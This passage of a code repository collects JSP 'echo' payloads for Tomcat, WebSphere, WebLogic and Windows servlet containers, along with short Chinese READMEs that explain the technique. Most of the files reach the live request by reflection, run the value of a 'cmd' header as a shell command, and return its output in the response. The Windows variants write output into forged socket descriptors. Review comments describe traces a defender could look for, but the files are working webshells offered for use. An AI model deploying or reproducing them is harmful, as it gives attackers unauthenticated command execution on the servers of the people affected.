12 | Thread[] threads = (Thread[])obj;
13 | label:for(Thread thread : threads){
14 | try{
15 | if(thread.getName().contains("http-nio") && thread.getName().contains("ClientPoller")) {
16 | field = thread.getClass().getDeclaredField("target");
17 | field.setAccessible(true);
18 | obj = field.get(thread);
19 |
20 | field = obj.getClass().getDeclaredField("this$0");
21 | field.setAccessible(true);
22 | obj = field.get(obj);
23 |
    // Here "handler" is read from the class two levels up the hierarchy only.
24 | field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
25 | field.setAccessible(true);
26 | obj = field.get(obj);
27 |
28 | field = obj.getClass().getDeclaredField("global");
29 | field.setAccessible(true);
30 | obj = field.get(obj);
31 |
32 | field = obj.getClass().getDeclaredField("processors");
33 | field.setAccessible(true);
34 | obj = field.get(obj);
35 |
36 |
37 | java.util.List processors = (java.util.List) obj;
38 | for (Object o : processors) {
39 | field = o.getClass().getDeclaredField("req");
40 | field.setAccessible(true);
41 | obj = field.get(o);
42 | org.apache.coyote.Request req = (org.apache.coyote.Request) obj;
43 |
    // The header value is client-controlled and is passed to exec() unchanged.
44 | String cmd = req.getHeader("cmd");
45 | if (cmd != null) {
46 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
    // This variant hands the output to doWrite as a java.nio.ByteBuffer.
47 | java.nio.ByteBuffer buffer = java.nio.ByteBuffer.wrap(res.getBytes());
48 | req.getResponse().doWrite(buffer);
    // Leaves both loops after the first request that carried the header.
49 | break label;
50 | }
51 | }
52 | }
53 | }catch(Exception e){
    // Any failure for one thread is printed with printStackTrace() and the
    // loop moves on to the next thread.
54 | e.printStackTrace();
55 | }
56 | }
57 | %>
--------------------------------------------------------------------------------
/Tomcat/code/TomcatEcho-全版本.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="org.apache.tomcat.util.buf.ByteChunk" %>
2 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
3 | <%
    // Review summary: this scriptlet runs the value of the "cmd" request header through
    // a shell (cmd.exe /c or /bin/sh -c, chosen from the os.name property) and writes the
    // output into the HTTP response of the request that carried the header. No
    // authentication, authorization or input validation appears here.
    // Every container type is touched through reflection (getMethod/invoke,
    // Class.forName) rather than through compile-time references.
    // Detection notes: reflective access to the private "threads" array of a ThreadGroup
    // and to target/this$0/handler/global/processors/req from JSP code, a request header
    // literally named "cmd", and a shell process started by the servlet container are the
    // observable traits of this file. Failures are swallowed silently (see the catch at
    // the end), so this code itself prints no stack trace.
4 | boolean flag = false;
5 | ThreadGroup group = Thread.currentThread().getThreadGroup();
6 | java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
7 | f.setAccessible(true);
8 | Thread[] threads = (Thread[]) f.get(group);
9 |
10 | for(int i = 0; i < threads.length; i++) {
11 | try{
12 | Thread t = threads[i];
13 | if (t == null) continue;
14 |
    // Skips threads whose name contains "exec" and threads whose name lacks "http".
15 | String str = t.getName();
16 | if (str.contains("exec") || !str.contains("http")) continue;
17 |
18 |
19 | f = t.getClass().getDeclaredField("target");
20 | f.setAccessible(true);
21 | Object obj = f.get(t);
22 |
23 | if (!(obj instanceof Runnable)) continue;
24 |
25 | f = obj.getClass().getDeclaredField("this$0");
26 | f.setAccessible(true);
27 | obj = f.get(obj);
28 |
    // "handler" is looked up on the object's own class first and, if it is not
    // declared there, on the class two levels up the hierarchy.
29 | try{
30 | f = obj.getClass().getDeclaredField("handler");
31 | }catch (NoSuchFieldException e){
32 | f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
33 | }
34 | f.setAccessible(true);
35 | obj = f.get(obj);
36 |
    // "global" is looked up on the superclass first, then on the class itself.
37 | try{
38 | f = obj.getClass().getSuperclass().getDeclaredField("global");
39 | }catch(NoSuchFieldException e){
40 | f = obj.getClass().getDeclaredField("global");
41 | }
42 | f.setAccessible(true);
43 | obj = f.get(obj);
44 |
45 | f = obj.getClass().getDeclaredField("processors");
46 | f.setAccessible(true);
47 | java.util.List processors = (java.util.List)(f.get(obj));
48 |
49 | for(int j = 0; j < processors.size(); ++j) {
50 | Object processor = processors.get(j);
51 | f = processor.getClass().getDeclaredField("req");
52 | f.setAccessible(true);
53 | Object req = f.get(processor);
54 | Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
55 |
    // str is reused here: it now holds the client-controlled "cmd" header value.
56 | str = (String)req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
57 |
58 | if (str != null && !str.isEmpty()) {
59 | resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
    // The header value becomes the shell's command string unchanged.
60 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
61 | byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
62 |
    // First tries doWrite with a ByteChunk argument; when that lookup raises
    // NoSuchMethodException it falls back to doWrite with a java.nio.ByteBuffer.
63 | try {
64 | Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
65 | obj = cls.newInstance();
66 | cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
67 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
68 | } catch (NoSuchMethodException var5) {
69 | Class cls = Class.forName("java.nio.ByteBuffer");
70 | obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
71 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
72 | }
73 |
74 | flag = true;
75 | }
76 |
    // flag ends the inner loop, and then the outer loop, after the first match.
77 | if (flag) break;
78 | }
79 |
80 | if (flag) break;
81 | }catch(Exception e){
    // Every exception for this thread is discarded and the next thread is tried.
82 | continue;
83 | }
84 | }
85 | %>
--------------------------------------------------------------------------------
/Tomcat/code/TomcatEchoTypeB-全版本.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 |
4 | // Reference:
5 | // "Tomcat echo without outbound network access, series part 6" https://xz.aliyun.com/t/7535
6 |
    // Review summary: this scriptlet runs the value of the "cmd" request header through
    // a shell (cmd.exe /c or /bin/sh -c, chosen from the os.name property) and writes the
    // output into the HTTP response of the request that carried the header. No
    // authentication, authorization or input validation appears here.
    // Instead of walking threads, it starts from the JMX MBean server obtained from
    // Tomcat's modeler Registry and reads private fields along
    // mbsInterceptor -> repository, queries "Catalina:type=GlobalRequestProcessor,*",
    // then reads resource -> processors -> req.
    // Detection notes: JSP code touching com.sun.jmx.mbeanserver / com.sun.jmx.interceptor
    // internals with setAccessible(true), a request header literally named "cmd", and a
    // shell process started by the servlet container are the observable traits of this file.
7 | boolean flag = false;
8 |
9 | javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
10 | java.lang.reflect.Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
11 | field.setAccessible(true);
12 | Object obj = field.get(mbeanServer);
13 |
14 | field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
15 | field.setAccessible(true);
16 | com.sun.jmx.mbeanserver.Repository repository = (com.sun.jmx.mbeanserver.Repository) field.get(obj);
17 |
    // Selects the MBeans registered under the Catalina domain with type GlobalRequestProcessor.
18 | java.util.Set objectSet = repository.query(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,*"), null);
19 | for(com.sun.jmx.mbeanserver.NamedObject namedObject : objectSet){
20 | javax.management.DynamicMBean dynamicMBean = namedObject.getObject();
21 | field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
22 | field.setAccessible(true);
23 | obj = field.get(dynamicMBean);
24 |
25 | field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
26 | field.setAccessible(true);
27 | java.util.ArrayList procssors = (java.util.ArrayList) field.get(obj);
28 |
29 | field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
30 | field.setAccessible(true);
31 | for(int i = 0; i < procssors.size(); i++){
32 | org.apache.coyote.Request req = (org.apache.coyote.Request) field.get(procssors.get(i));
    // The header value is client-controlled and becomes the shell's command string unchanged.
33 | String cmd = req.getHeader("cmd");
34 | if(cmd != null && !cmd.isEmpty()){
35 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
36 | byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
37 |
38 | Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
    // First tries doWrite with a ByteChunk argument; when that lookup raises
    // NoSuchMethodException it falls back to doWrite with a java.nio.ByteBuffer.
39 | try {
40 | Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
41 | obj = cls.newInstance();
42 | cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
43 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
44 | } catch (NoSuchMethodException var5) {
45 | Class cls = Class.forName("java.nio.ByteBuffer");
46 | obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
47 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
48 | }
49 |
50 | flag = true;
51 | }
52 |
53 | if(flag) break;
54 | }
55 | }
56 | %>
57 |
--------------------------------------------------------------------------------
/Tomcat/code/根据网上流传的xary payload提取的tomcat回显字节码文件.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/code/根据网上流传的xary payload提取的tomcat回显字节码文件.class
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat6 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat6 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat6.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat7 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat7 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat7.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8.5 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8.5 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8.5.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat9 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat9 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat9.png
--------------------------------------------------------------------------------
/Websphere/README.md:
--------------------------------------------------------------------------------
1 | # Websphere 回显
2 |
3 | ## 效果
4 | 
5 |
6 |
--------------------------------------------------------------------------------
/Websphere/code/websphereEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
    // Review summary: this scriptlet runs the value of the "cmd" request header with
    // Runtime.exec and prints the command output to the response writer. No
    // authentication, authorization or input validation appears here.
    // It reads the private "wsThreadLocals" field declared on the current thread's class,
    // scans the resulting array for an object whose class name ends with
    // "WebContainerRequestState", and obtains request and response from it by reflection.
    // Detection notes: reflective access to "wsThreadLocals" from JSP code, a request
    // header literally named "cmd", and a child process started by the application server
    // are the observable traits of this file.
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
8 | Object[] obj_arr = (Object[]) obj;
9 | for(int i = 0; i < obj_arr.length; i++){
10 | Object o = obj_arr[i];
11 | if(o == null) continue;
12 |
13 | if(o.getClass().getName().endsWith("WebContainerRequestState")){
14 | Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]);
15 | Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]);
16 |
    // The header value is client-controlled and is passed to exec() unchanged.
17 | String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
18 | if(cmd != null && !cmd.isEmpty()){
19 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
20 |
21 | java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]);
22 | printWriter.println(res);
23 | }
24 |
    // The scan stops at the first matching object whether or not the header was present.
25 | break;
26 | }
27 | }
28 | %>
29 |
--------------------------------------------------------------------------------
/Websphere/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Websphere/img/001.png
--------------------------------------------------------------------------------
/Windows/README.md:
--------------------------------------------------------------------------------
1 | # Windows 通用回显
2 |
3 | ## 说明
4 | 看了 ```lufei``` 师傅的文章 ```《win描述符下成功又失败的回显》```,才知道原来在 ```Windows NIO/BIO``` 中也有类似 ```Linux``` 中 ```FileDescriptor``` 的存在,虽然通过查看 ```JNI``` 的源码知道是一个句柄文件,但是用 ```Java```
5 | 代码处理起来都是类似的。
6 |
7 | ```Windows NIO/BIO``` 是通过 ```JNI``` 调用 ```winsock2.h``` 的 ```SOCKET WSAAPI accept(SOCKET s,sockaddr *addr,int *addrlen);``` 函数获取 ```socket```,
8 | 随后将其转换成 ```jint``` 返回给 ```Java``` 程序,存储为 ```FileDescriptor```。在向 ```socket``` 返回数据时, ```Java``` 代码再把 ```FileDescriptor``` 通过 ```JNI``` 转换为 ```SOCKET``` 传递给 ```
9 | int WSAAPI WSASend(SOCKET s,LPWSABUF lpBuffers,DWORD dwBufferCount,LPDWORD lpNumberOfBytesSent,DWORD dwFlags,LPWSAOVERLAPPED lpOverlapped,LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);```
10 | 函数,从而完成数据的发送。
11 |
12 | 开始的时候,想着可以通过遍历 ```fd``` 的值,利用反射创建对应的 FileDescriptor,然后通过 ```JNI``` 转换成 ```SOCKET``` 并传递给 ```getpeername``` 函数尝试去获取对端地址,如果能拿到结果,说明 ```fd``` 的值是有效的,
13 | 对应着一个有效的 ```socket```。
14 | 然而实践之后并没有拿到想要的结果。由于对 ```c``` 近乎一窍不通,于是只能放弃这种方式,转而从 ```Java``` 代码中尝试去寻找是否有接受 ```FileDescriptor``` 作为参数并返回一些信息的静态方法。结果果然找到了
15 | ```sun.nio.ch.Net#remoteAddress``` , 这个方法返回的结果就是我最开始时想通过 ```JNI``` 方式拿到的结果。
16 |
17 | 于是,一切就很简单了,遍历 ```fd``` 的值,利用反射创建对应的 ```FileDescriptor```,然后调用 ```sun.nio.ch.Net#remoteAddress``` 确认 ```FileDescriptor``` 的有效性,如果有效,往里面写数据,
18 | 从而实现回显。
19 |
20 | ## 效果
21 | 在 ```Tomcat 9.0.33```,```Jetty 9.4.30.v20200611```,```Resin/4.0.64``` 中测试通过
22 | 
23 | 
24 | 
25 |
26 | ## 参考
27 | * [win描述符下成功又失败的回显](https://xz.aliyun.com/t/7566)
28 | * [Socket 和 SocketChannel 的 FileDescriptor](https://blog.csdn.net/zxcc1314/article/details/99986252)
29 | * [https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/ServerSocketChannelImpl.c](https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/ServerSocketChannelImpl.c)
30 | * [https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/SocketDispatcher.c](https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/SocketDispatcher.c)
31 |
--------------------------------------------------------------------------------
/Windows/code/WindowsEcho-Deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
    // Review summary: this scriptlet does not use the servlet request or response at all.
    // It forges java.io.FileDescriptor values 0..9999 by writing the private "fd" field,
    // asks sun.nio.ch.Net.remoteAddress which of them are connected sockets with a
    // non-loopback peer, repeats the probe after two seconds, and then writes a
    // hand-built "HTTP/1.1 200 OK" message containing the output of a fixed echo command
    // to every descriptor that passed both probes.
    // The command string here is a constant, not request input.
    // NOTE(review): the write loop covers every surviving descriptor, so presumably any
    // other non-loopback connection that stays open across both probes receives the same
    // bytes - confirm before treating its effect as limited to one client.
    // Detection notes: JSP code calling setAccessible(true) on FileDescriptor.fd,
    // sun.nio.ch.Net, java.net.SocketOutputStream and java.net.PlainSocketImpl, plus a
    // child process started by the servlet container, are the observable traits of this file.
3 | //Preparation & initialization
4 | java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
5 | field.setAccessible(true);
6 |
7 | Class clazz1 = Class.forName("sun.nio.ch.Net");
8 | java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
9 | method1.setAccessible(true);
10 |
11 | Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
12 | java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
13 | constructor2.setAccessible(true);
14 |
15 | Class clazz3 = Class.forName("java.net.PlainSocketImpl");
16 | java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
17 | constructor3.setAccessible(true);
18 |
19 | java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
20 | write.setAccessible(true);
21 |
22 | java.net.InetSocketAddress remoteAddress = null;
23 | java.util.List list1 = new java.util.ArrayList();
24 | java.util.List list2 = new java.util.ArrayList();
25 | java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
26 |
27 | //First pass
28 | for(int i = 0; i < 10000; i++){
29 | field.set(fileDescriptor, i);
30 |
31 | try{
    // A value is kept only if remoteAddress returns without throwing and the
    // address string does not start with "/127.0.0.1".
32 | remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
33 | if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
34 | list1.add(i);
35 | }catch(Exception e){
36 | //pass
37 | }
38 | }
39 |
40 | //Delay 2s
41 | Thread.sleep(2000);
42 |
43 | //Second pass
44 | for(int i = 0; i < 10000; i++){
45 | field.set(fileDescriptor, i);
46 |
47 | try{
48 | remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
49 | if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
50 | list2.add(i);
51 | }catch(Exception e){
52 | //pass
53 | }
54 | }
55 |
56 | //Take the intersection
57 | list1.retainAll(list2);
58 |
59 | for(Integer fdVal : list1){
60 | try{
61 | field.set(fileDescriptor, fdVal);
    // Wraps the forged descriptor in a PlainSocketImpl and a SocketOutputStream,
    // both created through non-public constructors.
62 | Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
63 |
64 | String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
    // The status line and headers are assembled by hand and written straight to the socket.
65 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
66 | write.invoke(socketOutputStream, new Object[]{result.getBytes()});
67 | }catch (Exception e){
68 | //pass
69 | }
70 | }
71 | %>
--------------------------------------------------------------------------------
/Windows/code/WindowsEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | if(java.io.File.separator.equals("\\")){ // Review: body runs only where the path separator is a backslash. It probes descriptor numbers for sockets with a non-loopback peer and writes a hand-built HTTP response to one of them, so nothing passes through the servlet response object.
4 | java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd"); // private descriptor-number field of FileDescriptor
5 | field.setAccessible(true); // NOTE(review): on JDKs with strong encapsulation (17+) the setAccessible calls on java.base internals in this file should fail unless the JVM was started with matching --add-opens; confirm for the deployed runtime
6 |
7 | Class clazz1 = Class.forName("sun.nio.ch.Net");
8 | java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",new Class[]{java.io.FileDescriptor.class}); // JDK-internal peer-address lookup, invoked statically below
9 | method1.setAccessible(true);
10 |
11 | Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null); // null loader: resolved through the bootstrap loader, class not initialized by this call
12 | java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0]; // whichever constructor is returned first; the order is JDK-dependent
13 | constructor2.setAccessible(true);
14 |
15 | Class clazz3 = Class.forName("java.net.PlainSocketImpl");
16 | java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
17 | constructor3.setAccessible(true);
18 |
19 | java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
20 | write.setAccessible(true);
21 |
22 | java.net.InetSocketAddress remoteAddress = null;
23 | java.util.List list = new java.util.ArrayList(); // candidate descriptor numbers, in ascending order
24 | java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor(); // one object reused; its fd field is overwritten on every probe
25 | for(int i = 0; i < 50000; i++){ // probes descriptor values 0..49999
26 | field.set((Object)fileDescriptor, (Object)(new Integer(i)));
27 | try{
28 | remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});
29 | if(remoteAddress.toString().startsWith("/127.0.0.1")) continue; // IPv4 loopback peers are skipped
30 | if(remoteAddress.toString().startsWith("/0:0:0:0:0:0:0:1")) continue; // IPv6 loopback peers are skipped
31 | list.add(new Integer(i));
32 |
33 | }catch(Exception e){} // any failure of the lookup (including a null address) just drops this descriptor value
34 | }
35 |
36 | for(int i = list.size() - 1; i >= 0; i--){ // candidates are tried from the highest descriptor number down
37 | try{
38 | field.set((Object)fileDescriptor, list.get(i));
39 | Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
40 | String[] cmd = new String[]{"cmd","/C", "whoami"}; // fixed command; no request input is read anywhere in this file
41 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next().trim(); // defender view: a cmd.exe child spawned by the application-server JVM is the host-side trace of this line
42 | String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + (res.length()) + "\n\n" + res + "\n\n";
43 | write.invoke(socketOutputStream, new Object[]{result.getBytes()});
44 | break; // stops after the first candidate whose write does not throw
45 | }catch (Exception e){
46 | //pass
47 | }
48 | }
49 | }
50 | %>
--------------------------------------------------------------------------------
/Windows/img/Jetty.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Windows/img/Jetty.png
--------------------------------------------------------------------------------
/Windows/img/Resin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Windows/img/Resin.png
--------------------------------------------------------------------------------
/Windows/img/Tomcat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Windows/img/Tomcat.png
--------------------------------------------------------------------------------
/weblogic/README.md:
--------------------------------------------------------------------------------
1 | # Weblogic 回显
2 |
3 | ## 说明
4 | 代码直接搬运了 ```lufei``` 师傅的代码
5 | ## 效果
6 | 
7 | 
8 | ## 参考
9 | [weblogic_2019_2725poc与回显构造](https://xz.aliyun.com/t/5299)
10 |
--------------------------------------------------------------------------------
/weblogic/code/WeblogicEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork(); // Review: the scriptlet takes the current thread's work item, reads the "cmd" request header from it, runs that value with Runtime.exec and writes the output to the WebLogic response. The cast throws ClassCastException on any thread that is not a weblogic.work.ExecuteThread.
4 | if(adapter.getClass().getName().endsWith("ServletRequestImpl")){ // branch 1: the work item's class name ends with ServletRequestImpl
5 | String cmd = (String) adapter.getClass().getMethod("getHeader", String.class).invoke(adapter, "cmd"); // defender view: a request header literally named "cmd" is the network-side trace of this page
6 |
7 | if(cmd != null && !cmd.isEmpty()){ // nothing happens when the header is absent or empty
8 | String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); // header value reaches Runtime.exec unvalidated; reads the child's whole stdout as one token
9 | weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) adapter.getClass().getMethod("getResponse").invoke(adapter);
10 | res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
11 | res.getServletOutputStream().flush();
12 | res.getWriter().write("");
13 | }
14 | }else{ // branch 2: any other work-item class; the request is reached through a private field instead
15 | java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); // NoSuchFieldException if the work-item class declares no such field
16 | field.setAccessible(true);
17 | Object obj = field.get(adapter);
18 | obj = obj.getClass().getMethod("getServletRequest").invoke(obj);
19 | String cmd = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "cmd");
20 |
21 | if(cmd != null && !cmd.isEmpty()){
22 | String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); // same unvalidated header-to-exec flow as in branch 1
23 | weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getResponse").invoke(obj);
24 | res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
25 | res.getServletOutputStream().flush();
26 | res.getWriter().write("");
27 | }
28 | }
29 | %>
30 |
--------------------------------------------------------------------------------
/weblogic/code/weblogic-10.0.3-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | String cmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("cmd"); // Review: casts the current thread's work item directly to ServletRequestImpl and reads the "cmd" request header; either cast throws ClassCastException when the runtime types differ
4 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); // header value goes to Runtime.exec with no null or content check
5 | weblogic.servlet.internal.ServletResponseImpl r = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
6 | weblogic.servlet.internal.ServletOutputStreamImpl outputStream = r.getServletOutputStream();
7 | outputStream.writeStream(new weblogic.xml.util.StringInputStream(res)); // command output is written to the response obtained from the work item, not to the JSP's own response
8 | outputStream.flush();
9 | response.getWriter().write(""); // the JSP implicit response object only receives an empty string
10 | %>
--------------------------------------------------------------------------------
/weblogic/code/weblogic-12.1.3-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread)Thread.currentThread(); // Review: this variant runs a fixed echo command and writes its output through the HttpConnectionHandler held in the work item's private connectionHandler field; no request input is read
